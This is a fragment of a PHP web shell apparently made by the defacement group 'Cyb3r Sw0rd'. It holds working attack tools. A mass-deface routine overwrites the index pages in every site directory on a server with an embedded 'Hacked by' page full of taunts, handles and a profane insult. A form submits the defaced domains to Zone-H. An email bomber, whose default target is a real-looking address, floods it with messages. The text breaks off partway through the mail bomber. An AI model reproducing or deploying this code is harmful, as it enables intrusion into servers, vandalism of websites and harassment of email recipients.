9IlN1Ym1pdCIgbmFtZT0iTm90aWZ5Tm93VG9ab25lSCIgLz48L2NlbnRlcj4NCjwvZm9ybT48L3RkPjwvdHI+PC90YWJsZT48L2Zvcm0+DQo8L3RkPjwvZGl2Pg==');
}
if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){
if($_POST['NotifyNowToZoneH'])
{
echo '<center>';
ob_start();
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){die(base64_decode('U29ycnkhIEN1cmwgaXMgbm90IHN1cHBvcnRlZCBpbiB0aGlzIHNlcnZlciE='));}
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
        
if (empty($hacker))
{die (base64_decode("RXJyb3IhIFlvdSBtdXN0IGZpbGwgdGhlIG5vdGlmaWVyIG5hbWUh"));}
else if($method == "--------SELECT--------")
{die(base64_decode("RXJyb3IhIFlvdSBtdXN0IHNlbGVjdCBhbnkgbWV0aG9kIQ=="));}
elseif($neden == "--------SELECT--------")
{die(base64_decode("RXJyb3IhIFlvdSBtdXN0IHNlbGVjdCBhbnkgcmVhc29uIQ=="));}
elseif(empty($site))
{die(base64_decode("RXJyb3IhIFlvdSBtdXN0IGVudGVyIHNpdGVzIG5hbWUh"));}
$i = 0;
$sites = explode("\n", $site);
while($i < count($sites)) 
{
if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
mirror_zoneh("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
echo "Site : ".$sites[$i]." Mirrored !\n";
++$i;
}
echo "Mirror Send Successfully to zone-h!";
}
echo '</center>';
}
if (isset($_GET['action']) && $_GET['action']=='massdeface')
{

echo base64_decode($result);
if (isset($_POST['mdir']))
$post_dir = $_POST['mdir'];
$current_dir = $post_dir;
if (isset($_POST['safemod']))
$safe_mod = $_POST['safemod'];
if (!is_dir($post_dir))
{
echo "Directory ".$post_dir." Not Found!";
header ("location: $self");
exit;
}
if (isset($_POST['safemod']) && $_POST['safemod']==1)
echo base64_decode("U2FmZSBEZWZhY2UgQWN0aXZhdGUhPGJyLz48cCBhbGlnbj0nbGVmdCc+");
$items_per_page = 5000;
if (!isset($page)) {$page = 0;}
$total = 0;
$wordcount = strlen($current_dir);
$lastword = substr($current_dir,($wordcount-1),$wordcount);
if ($lastword!='/'||$lastword!='\\')
$readdir = $current_dir."/";
else
$readdir = $current_dir;
if(!($dp = opendir($readdir))) die (base64_decode("RXJyb3IgSW4gT3BlbmluZyBEaXJlY3Rvcnkh"));
$file_array = array();
 
while ($file = readdir ($dp))
{
if(substr($file,0,1) != '.')
{
$file_array[] =  $file;
}
}
$file_count = count ($file_array);
sort ($file_array);
if ($file_count > 0)
{
$first_record = $page * $items_per_page;
$last_record = $first_record + $items_per_page;
while (list($fileIndexValue, $file_name) = each ($file_array))
{
if (($fileIndexValue >= $first_record) AND ($fileIndexValue < $last_record))
{
if (is_dir($readdir.$file_name))
{
$fname = $readdir.$file_name."/index.php";
$fname2 = $readdir.$file_name."/index.html";
$mirror_domains = $file_name;
$mirror .= $mirror_domains."\n";
if (isset($_POST['safemod']) && $_POST['safemod']==1)
{
if (file_exists($fname))
{
rename($fname,$readdir.$file_name.'/index2.php');
}
if (file_exists($fname2))
{
rename($fname2,$readdir.$file_name.'/index2.html');
}
}
$dsc = "

<html>
	<head>
		<title>
			Hacked by Cyb3r Sw0rd
		</title>
		<script language="JavaScript1.2">                            
var speed=1            
var currentpos=0,alt=1,curpos1=0,curpos2=-1               
function initialize(){               
startit()               
}               
function scrollwindow(){               
if (document.all)               
temp=document.body.scrollTop               
else               
temp=window.pageYOffset               
if (alt==0)               
alt=1               
else               
alt=0               
if (alt==0)               
curpos1=temp               
else               
curpos2=temp               
if (curpos1!=curpos2){               
if (document.all)               
currentpos=document.body.scrollTop+speed               
else               
currentpos=window.pageYOffset+speed               
window.scroll(0,currentpos)               
}               
else{               
currentpos=30               
window.scroll(0,currentpos)               
}               
}               
function startit(){               
setInterval("scrollwindow()",55)               
}               
window.onload=initialize               
</script>
<script>
/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert('Access Denied! Protected By Cyb3r Sw0rd!');
        }
        return false;
};
</script>
		<style>
			body{background: url(http://s27.postimg.org/tg0iaxobz/BGscarystuff.gif);}
			.top-bg{background:url(http://s21.postimg.org/m3pot5ytj/bloodani.gif) repeat-x;height: 25px;margin-top: -69px}
			.header{margin-top: -40px}
			.header h2{color: red;font-size: 80px;text-align: center;font-family: pieces nfi;text-shadow: 1px 5px 3px yellow}
			.logo{text-align: center;margin-top: -68px;}
			.logo img{width: 450px;height: 450px}
			h1,h2,h3,h4{color: #fff}
			.grets{color: green;font-size: 45px}
			.bis{color: red}
			.message{}
			.message h2{text-align: center;}
			.gretss{text-align: center;width: 960px;margin: 0 auto}
			.gretss h2{text-align: center;}
			a{color: #fff;text-decoration: none;}
			.msgh2{color: red}
			.rk a{color: yellow}
			.kb a{color: red}
			.sp a{color: green}
			.rz a{color: blue}
			.xs a{color: teal}
			.cb a{color: red}
			.ds a{color: brown}
			.sh a{color: #FA1459}
			.sn a{color: #1B12CC}
			.vc a{color: #AE0001}
			.bc a{color: #FCD208}
			.ih a{color: #E47725}
			.hb a{color: #0098F5}
			.lt a{color: #A6A6A6}
			.dk a{color: #FF3200}
			.fell {}
			.contacts{position: fixed;right: 0;bottom: 0}
			.contacts a img{width: 200px;height: 200px}
		</style>
	</head>
	<body oncontextmenu="return false;">
		<div class="top-bg">
		</div>
		<br>
		<br>
		<br>
		<br>
		<br>
		<br>
		<div class="header">
			<h2>Hacked by "Cyb3r Sw0rd"</h2>
		</div>
		<div class="logo">
			<img src="http://s12.postimg.org/tuv5l5p31/360x630_profile_logo.png">
		</div>
		<marquee class="grets">
			<h2 class="grets">Security Doesn't Exists in Our <span class="bis">Dictionary !!! </span>We Are <span class="bis">FEARLESS !!!</span> We Are <span class="bis"> UNITED !!!</span> We Are  <span class="bis">ONE !!! </span> We Are <span class="bis">UNBEATABLE !!!</span> </h2>
		</marquee>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>
<font size="20"><script> 
farbbibliothek = new Array(); 
farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 
farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); 
farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); 
farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 
farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 
farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); 
farbbibliothek[6] = new Array("#0000FF","#FFFF00"); 
farben = farbbibliothek[4];
function farbschrift() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.all["a"+i].style.color=farben[i]; 
} 
farbverlauf(); 
} 
function string2array(text) 
{ 
Buchstabe = new Array(); 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
k=0; 
while(k<=text.length) 
{ 
Buchstabe[k] = text.charAt(k); 
k++; 
} 
} 
function divserzeugen() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 
} 
farbschrift(); 
} 
var a=1; 
function farbverlauf() 
{ 
for(var i=0 ; i<farben.length; i++) 
{ 
farben[i-1]=farben[i]; 
} 
farben[farben.length-1]=farben[-1]; 
 
setTimeout("farbschrift()",30); 
} 
// XLEETX SNAPER
var farbsatz=1; 
function farbtauscher() 
{ 
farben = farbbibliothek[farbsatz]; 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 
} 
setInterval("farbtauscher()",4500); 
text= "== Feel Our Power == Feel What We are =="; 
//h 
string2array(text);
divserzeugen(); 
//document.write(text);   
//
/*
function expand() {
for(x = 0; x < 50; x++) {
window.moveTo(screen.availWidth * -(x - 50) / 100, screen.availHeight * -(x - 50) / 100);
window.resizeTo(screen.availWidth * x / 50, screen.availHeight * x / 50);
}
window.moveTo(0,0);
window.resizeTo(screen.availWidth, screen.availHeight);
}
expand();
*/
</script>
</font>
</center>
<br>
<br>
<br>
<br>
<br>
<br>
<!---
		<div class="fell1">== Feel Our Power == Feel What We are ==</div>
		== Dont Mass With Us ==</div>
		<div class="fell2">Remember My Eyes is On you</div>
--->
			<div class="message">
				<h2 class="msgh2">Message To Admin</h2>
					<h2>Dear Admin !!! </h2>
						<h2>Your Site Security is Good,</h2> 
						<h2>But not Enough to Stop "Cyb3r Sw0rd"</h2>
						<h2>We didn't Harm Your Site</h2>
						<h2>We Just Defaced</h2>
						<h2>Better Luck, Next Time!!!</h2>
						<h2>Dedicated To: The Great Lamer Named As "TANJIM BAL FUCKHIM"</h2>
<br>
<br>
<br>
<br>
<br>
<br>
			</div>
			<div class="gretss">
				<h2 class="msgh2">We Are</h2>
				<marquee>
					<h2><span class="rk"><a href="https://www.facebook.com/black.cod3r">!!! Bl4ck_C0d3R !!!</a></span> <span class="xs"><a href="https://www.facebook.com/xleetx">Xl33tX_Sn4p3R !!!</a></span> <span class="vc"><a href="https://www.facebook.com/v0dr0.chele">Vodro Chele !!!</a></span> <span class="cb"><a href="https://www.facebook.com/cyb3rsw0rd">Heart_Bleed !!!</a></span> <span class="bc"><a href="https://www.facebook.com/profile.php?id=100007989585081">Bidrohi Chinmoy !!!</a></span> <span class="ds"><a href="https://www.facebook.com/H4CK3RD55">Dreamless Sunny !!!</a></span> <span class="sh"><a href="https://www.facebook.com/profile.php?id=100008384708395">Stone Hearted Hiya !!!</a></span> <span class="sn"><a href="https://www.facebook.com/rafiqu.lislam4">Shopno Nill !!!</a></span> <span class="lt"><a href="https://www.facebook.com/gf.hacker">Leet Tomon !!!</a></span> <span class="ih"><a href="https://www.facebook.com/INCRYPT0.HAX0R">Incrypto Haxor !!!</a></span> <span class="dk"><a href="https://www.facebook.com/Dang3r.Khan">Danger Khan !!!</a></span> <span class="hb"><a href="https://www.facebook.com/profile.php?id=100005025676065">Hidden Baba !!!</a></span> <span class="cd"><a href="https://www.facebook.com/gugala1">Cyber Dark !!!</a></span></h2>
				</marquee>
			</div>
			<div class="contacts">
				<a target="_blank" href="https://www.facebook.com/pages/Cyb3r-Sw0rd-We-Are-Unbeatable/779632825422850"><img src="http://s12.postimg.org/tuv5l5p31/360x630_profile_logo.png"></a>
			</div>
	
	</body> <p align=center><script language="javascript" type="text/javascript"src="http://htmlfreecodes.com/userdata/heart.js"></script></p>
<a target="_blank" href="https://www.facebook.com/cyb3rsw0rd" style="font-size: 8pt; text-decoration: none"> </a>  <A HREF="https://www.facebook.com/cyb3rsw0rd"><FONT COLOR="#FF0000"> </FONT></A>
<br />
<a target="_blank" href="https://www.facebook.com/cyb3rsw0rd" style="font-size: 8pt; text-decoration: none"> </a>  
	<embed src="http://www.youtube.com/v/nZYcfjPSmOU&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
</html>
<CENTER> <a href="http://tinypic.com?ref=25hmk5y" target="_blank"><img src="http://i57.tinypic.com/25hmk5y.gif" border="0" alt="Image and video hosting by TinyPic"></a> </CENTER>

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center><font color="red" size="3">	 Copyright &#169; Cyb3r Sw0rd </font></center>
<br>
<br>
<br>";
$fp = fopen($readdir.$file_name.'/index.php', 'w');
$r = fwrite($fp, base64_decode($dsc));
fclose($fp);
$fp = fopen($readdir.$file_name.'/index.html', 'w');
$r = fwrite($fp, base64_decode($dsc));
fclose($fp);
echo $file_name."<br/>";

$mirror_domains = $file_name;
$mirror .= $mirror_domains."\n";
}
}
}
echo base64_decode("PC9wPg==");
if (base64_decode('JGluZGV4ZWQ='))
{
echo base64_decode('VGhpcyBTaXRlIERlZmFjZWQgU3VjY2Vzc2Z1bGx5IQ==');
echo base64_decode("PGNlbnRlcj48Yj48Zm9udCBjb2xvcj0jRkZGPlpvbmUtSCBNaXJyb3IgU2VuZGVyPC9mb250PjwvYj48L2NlbnRlcj48Zm9ybSBhY3Rpb249Jz9hY3Rpb249em9uZS1oJyBtZXRob2Q9J3Bvc3QnPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2RlZmFjZXInIHZhbHVlPSdDeWIzcl9TdzByZCc+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0naGFja21vZGUnIHZhbHVlPScxJz48aW5wdXQgdHlwZT0naGlkZGVuJyBuYW1lPSdyZWFzb24nIHZhbHVlPScxJz48dGV4dGFyZWEgc3R5bGU9J2NvbG9yOiAjMDA5OTAwOyBiYWNrZ3JvdW5kOnRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA5OTAwOycgbmFtZT0nZG9tYWluJyBjb2xzPSc2MCcgcm93cz0nOScgaWQ9J2RvbWFpbnMnPg==").$mirror.base64_decode("PC90ZXh0YXJlYT48YnIvPjxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSdTZW5kIFRvIFpvbmUtSCcgbmFtZT0nTm90aWZ5Tm93VG9ab25lSCcvPg==");}
}
else{echo base64_decode('VGhlcmUgSXMgYW4gZXJyb3IgdG8gRGVmYWNlbWVudCE=');}
echo "<br/>";
closedir($dp);
echo base64_decode($endover);
}
else if (get(action)==massd)
{
echo "<font color=\"green\"><b>Mass Deface</b></font><br/><br/>";
echo "<form action=\"?action=massdeface\" method=\"post\">";
echo "<font color=\"blue\"><b>Choose Directory:</b></font><br/><input name=\"mdir\" value=\"$current_dir\"><br/>";
echo "<font color=\"blue\"><b>Safe Mode:</b></font><br/><input type=\"checkbox\" name=\"safemod\" value=\"1\"><br/>";
echo "<input type=\"submit\" value=\"Deface\">";
echo "</form>";

}
else
if (isset($_GET['action']) && $_GET['action']=='massdeface')
{
echo "<div style=\"background-color:#FFF; \">";
echo base64_decode($result);
if (isset($_POST['mdir']))
$post_dir = $_POST['mdir'];
$current_dir = $post_dir;
if (isset($_POST['safemod']))
$safe_mod = $_POST['safemod'];
if (!is_dir($post_dir))
{
echo "Directory ".$post_dir." Not Found!";
header ("location: $self");
exit;
}
if (isset($_POST['safemod']) && $_POST['safemod']==1)
echo base64_decode("U2FmZSBEZWZhY2UgQWN0aXZhdGUhPGJyLz48cCBhbGlnbj0nbGVmdCc+");
$items_per_page = 5000;
if (!isset($page)) {$page = 0;}
$total = 0;
$wordcount = strlen($current_dir);
$lastword = substr($current_dir,($wordcount-1),$wordcount);
if ($lastword!='/'||$lastword!='\\')
$readdir = $current_dir."/";
else
$readdir = $current_dir;
if(!($dp = opendir($readdir))) die (base64_decode("RXJyb3IgSW4gT3BlbmluZyBEaXJlY3Rvcnkh"));
$file_array = array();
 
while ($file = readdir ($dp))
{
if(substr($file,0,1) != '.')
{
$file_array[] =  $file;
}
}
$file_count = count ($file_array);
sort ($file_array);
if ($file_count > 0)
{
$first_record = $page * $items_per_page;
$last_record = $first_record + $items_per_page;
while (list($fileIndexValue, $file_name) = each ($file_array))
{
if (($fileIndexValue >= $first_record) AND ($fileIndexValue < $last_record))
{
if (is_dir($readdir.$file_name))
{
$fname = $readdir.$file_name."/index.php";
$fname2 = $readdir.$file_name."/index.html";
$mirror_domains = $file_name;
$mirror .= $mirror_domains."\n";
if (isset($_POST['safemod']) && $_POST['safemod']==1)
{
if (file_exists($fname))
{
rename($fname,$readdir.$file_name.'/index2.php');
}
if (file_exists($fname2))
{
rename($fname2,$readdir.$file_name.'/index2.html');
}
}
$dsc = "

<html>
	<head>
		<title>
			Hacked by Cyb3r Sw0rd
		</title>
		<script language="JavaScript1.2">                            
var speed=1            
var currentpos=0,alt=1,curpos1=0,curpos2=-1               
function initialize(){               
startit()               
}               
function scrollwindow(){               
if (document.all)               
temp=document.body.scrollTop               
else               
temp=window.pageYOffset               
if (alt==0)               
alt=1               
else               
alt=0               
if (alt==0)               
curpos1=temp               
else               
curpos2=temp               
if (curpos1!=curpos2){               
if (document.all)               
currentpos=document.body.scrollTop+speed               
else               
currentpos=window.pageYOffset+speed               
window.scroll(0,currentpos)               
}               
else{               
currentpos=30               
window.scroll(0,currentpos)               
}               
}               
function startit(){               
setInterval("scrollwindow()",55)               
}               
window.onload=initialize               
</script>
<script>
/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert('Access Denied! Protected By Cyb3r Sw0rd!');
        }
        return false;
};
</script>
		<style>
			body{background: url(http://s27.postimg.org/tg0iaxobz/BGscarystuff.gif);}
			.top-bg{background:url(http://s21.postimg.org/m3pot5ytj/bloodani.gif) repeat-x;height: 25px;margin-top: -69px}
			.header{margin-top: -40px}
			.header h2{color: red;font-size: 80px;text-align: center;font-family: pieces nfi;text-shadow: 1px 5px 3px yellow}
			.logo{text-align: center;margin-top: -68px;}
			.logo img{width: 450px;height: 450px}
			h1,h2,h3,h4{color: #fff}
			.grets{color: green;font-size: 45px}
			.bis{color: red}
			.message{}
			.message h2{text-align: center;}
			.gretss{text-align: center;width: 960px;margin: 0 auto}
			.gretss h2{text-align: center;}
			a{color: #fff;text-decoration: none;}
			.msgh2{color: red}
			.rk a{color: yellow}
			.kb a{color: red}
			.sp a{color: green}
			.rz a{color: blue}
			.xs a{color: teal}
			.cb a{color: red}
			.ds a{color: brown}
			.sh a{color: #FA1459}
			.sn a{color: #1B12CC}
			.vc a{color: #AE0001}
			.bc a{color: #FCD208}
			.ih a{color: #E47725}
			.hb a{color: #0098F5}
			.lt a{color: #A6A6A6}
			.dk a{color: #FF3200}
			.fell {}
			.contacts{position: fixed;right: 0;bottom: 0}
			.contacts a img{width: 200px;height: 200px}
		</style>
	</head>
	<body oncontextmenu="return false;">
		<div class="top-bg">
		</div>
		<br>
		<br>
		<br>
		<br>
		<br>
		<br>
		<div class="header">
			<h2>Hacked by "Cyb3r Sw0rd"</h2>
		</div>
		<div class="logo">
			<img src="http://s12.postimg.org/tuv5l5p31/360x630_profile_logo.png">
		</div>
		<marquee class="grets">
			<h2 class="grets">Security Doesn't Exists in Our <span class="bis">Dictionary !!! </span>We Are <span class="bis">FEARLESS !!!</span> We Are <span class="bis"> UNITED !!!</span> We Are  <span class="bis">ONE !!! </span> We Are <span class="bis">UNBEATABLE !!!</span> </h2>
		</marquee>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>
<font size="20"><script> 
farbbibliothek = new Array(); 
farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 
farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); 
farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); 
farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 
farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 
farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); 
farbbibliothek[6] = new Array("#0000FF","#FFFF00"); 
farben = farbbibliothek[4];
function farbschrift() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.all["a"+i].style.color=farben[i]; 
} 
farbverlauf(); 
} 
function string2array(text) 
{ 
Buchstabe = new Array(); 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
k=0; 
while(k<=text.length) 
{ 
Buchstabe[k] = text.charAt(k); 
k++; 
} 
} 
function divserzeugen() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 
} 
farbschrift(); 
} 
var a=1; 
function farbverlauf() 
{ 
for(var i=0 ; i<farben.length; i++) 
{ 
farben[i-1]=farben[i]; 
} 
farben[farben.length-1]=farben[-1]; 
 
setTimeout("farbschrift()",30); 
} 
// XLEETX SNAPER
var farbsatz=1; 
function farbtauscher() 
{ 
farben = farbbibliothek[farbsatz]; 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 
} 
setInterval("farbtauscher()",4500); 
text= "== Feel Our Power == Feel What We are =="; 
//h 
string2array(text);
divserzeugen(); 
//document.write(text);   
//
/*
function expand() {
for(x = 0; x < 50; x++) {
window.moveTo(screen.availWidth * -(x - 50) / 100, screen.availHeight * -(x - 50) / 100);
window.resizeTo(screen.availWidth * x / 50, screen.availHeight * x / 50);
}
window.moveTo(0,0);
window.resizeTo(screen.availWidth, screen.availHeight);
}
expand();
*/
</script>
</font>
</center>
<br>
<br>
<br>
<br>
<br>
<br>
<!---
		<div class="fell1">== Feel Our Power == Feel What We are ==</div>
		== Dont Mass With Us ==</div>
		<div class="fell2">Remember My Eyes is On you</div>
--->
			<div class="message">
				<h2 class="msgh2">Message To Admin</h2>
					<h2>Dear Admin !!! </h2>
						<h2>Your Site Security is Good,</h2> 
						<h2>But not Enough to Stop "Cyb3r Sw0rd"</h2>
						<h2>We didn't Harm Your Site</h2>
						<h2>We Just Defaced</h2>
						<h2>Better Luck, Next Time!!!</h2>
						<h2>Dedicated To: The Great Lamer Named As "TANJIM BAL FUCKHIM"</h2>
<br>
<br>
<br>
<br>
<br>
<br>
			</div>
			<div class="gretss">
				<h2 class="msgh2">We Are</h2>
				<marquee>
					<h2><span class="rk"><a href="https://www.facebook.com/black.cod3r">!!! Bl4ck_C0d3R !!!</a></span> <span class="xs"><a href="https://www.facebook.com/xleetx">Xl33tX_Sn4p3R !!!</a></span> <span class="vc"><a href="https://www.facebook.com/v0dr0.chele">Vodro Chele !!!</a></span> <span class="cb"><a href="https://www.facebook.com/cyb3rsw0rd">Heart_Bleed !!!</a></span> <span class="bc"><a href="https://www.facebook.com/profile.php?id=100007989585081">Bidrohi Chinmoy !!!</a></span> <span class="ds"><a href="https://www.facebook.com/H4CK3RD55">Dreamless Sunny !!!</a></span> <span class="sh"><a href="https://www.facebook.com/profile.php?id=100008384708395">Stone Hearted Hiya !!!</a></span> <span class="sn"><a href="https://www.facebook.com/rafiqu.lislam4">Shopno Nill !!!</a></span> <span class="lt"><a href="https://www.facebook.com/gf.hacker">Leet Tomon !!!</a></span> <span class="ih"><a href="https://www.facebook.com/INCRYPT0.HAX0R">Incrypto Haxor !!!</a></span> <span class="dk"><a href="https://www.facebook.com/Dang3r.Khan">Danger Khan !!!</a></span> <span class="hb"><a href="https://www.facebook.com/profile.php?id=100005025676065">Hidden Baba !!!</a></span> <span class="cd"><a href="https://www.facebook.com/gugala1">Cyber Dark !!!</a></span></h2>
				</marquee>
			</div>
			<div class="contacts">
				<a target="_blank" href="https://www.facebook.com/pages/Cyb3r-Sw0rd-We-Are-Unbeatable/779632825422850"><img src="http://s12.postimg.org/tuv5l5p31/360x630_profile_logo.png"></a>
			</div>
	
	</body> <p align=center><script language="javascript" type="text/javascript"src="http://htmlfreecodes.com/userdata/heart.js"></script></p>
<a target="_blank" href="https://www.facebook.com/cyb3rsw0rd" style="font-size: 8pt; text-decoration: none"> </a>  <A HREF="https://www.facebook.com/cyb3rsw0rd"><FONT COLOR="#FF0000"> </FONT></A>
<br />
<a target="_blank" href="https://www.facebook.com/cyb3rsw0rd" style="font-size: 8pt; text-decoration: none"> </a>  
	<embed src="http://www.youtube.com/v/nZYcfjPSmOU&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
</html>
<CENTER> <a href="http://tinypic.com?ref=25hmk5y" target="_blank"><img src="http://i57.tinypic.com/25hmk5y.gif" border="0" alt="Image and video hosting by TinyPic"></a> </CENTER>

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center><font color="red" size="3">	 Copyright &#169; Cyb3r Sw0rd </font></center>
<br>
<br>
<br>";
$fp = fopen($target.'/index.php', 'w');
$r = fwrite($fp, base64_decode($dsc));
fclose($fp);
$fp = fopen($target.'/index.html', 'w');
$r .= fwrite($fp, base64_decode($dsc));
fclose($fp);
//echo "<font color=\"red\">".$file_name."</font><br/>";
}
}
}
if ($r)
{

echo "<font color=\"green\"><b>Mass Defacement Completed Successfully!</b></font><br/>";
echo "<center><b><font color=#FFF>Zone-H Mirror Sender</font></b></center><form action='?action=zone-h' method='post'><input type='hidden' name='defacer' value='Cyb3r_Sw0rd'><input type='hidden' name='hackmode' value='1'><input type='hidden' name='reason' value='1'><textarea style='color: #009900; background:transparent; box-shadow: 0px 0px 4px #009900;' name='domain' cols='60' rows='9' id='domains'>".$mirror."</textarea><br/><input type='submit' value='Send To Zone-H' name='NotifyNowToZoneH'/>";}
}
else{echo 'There Is an error to Defacement!';}
echo "<br/>";
closedir($dp);
echo base64_decode($endover);
echo "</div>";
}
else if (get(action)==mailbomber)
{
echo "<style type=\"text/css\">";
echo "
.header{
position:fixed;
top:0;
center:0;
background-color: #6D472D;
color: #FFF;
border-radius: 5px;
padding:5px 5px;
width: 100%;
margin-left: -10px;
font-family: Comic Sans MS;
font-weight:bold;
}

input,textarea,select
{
border:1px solid red;
background-color: black;
color:red;
padding: 5px;
}
input:focus,textarea:focus,select:focus
{
color: #FFF;
boredr: 1px solid #B24028;
}
";
echo "</style>";
//echo "<div class=\"header\">Cyb3r Sw0rd E-mail Bomber</div><br/>";
$me = "xleetx_snaper";
$sitename = $_SERVER["HTTP_HOST"];
$mymail = strtolower("$me@$sitename");
echo "<form method=\"post\"><b>Notifier:</b> <input name=\"from\" value=\"xl33tx_sn4p3r\"> <b>Target:</b> <input name=\"to\" value=\"zuck@facebook.com\" maxlength=\"200\" /><br/><b>Subject:</b> <input name=\"subject\" value=\"Mail Kiss By Sn4p3R\" maxlength=\"100\" /> <b>Amount:</b> <input name=\"amount\" value=\"100\" maxlength=\"6\" /><br/><b>Message:</b><br/><textarea cols=\"60\" rows=\"9\" name=\"message\" maxlength=\"50000\"/>Baby! You are Fucked up By xl33tx_sn4p3r!</textarea><br/><input type=\"hidden\" name=\"send\" value=\"1\"><input type=\"Submit\" Value=\"Bomb!\"></form><br/><br/>";
if (isset($_POST["send"]) && $_POST["send"]==1)
{

$email = strtolower($_POST['to']);
$sender = $_POST['from'];
$text = $_POST['message'];
$subj = $_POST['subject'];
$camount = $_POST['amount'];
if ($sender=="")$mailer = "xleetx_snaper";else $mailer = $sender;
if ($camount<1)$amount = 1;else$amount = $camount;
$me = $sender;
$sitename = $_SERVER["HTTP_HOST"];
$from = strtolower("$me@$sitename");
$from = $from."<".$from.">";
$headers = "MIME-Version: 1.0\r\n";
$headers.="Content-type: text/html; charset=iso-8859-1\r\n";
$headers.="From: ".$from."\r\n";	
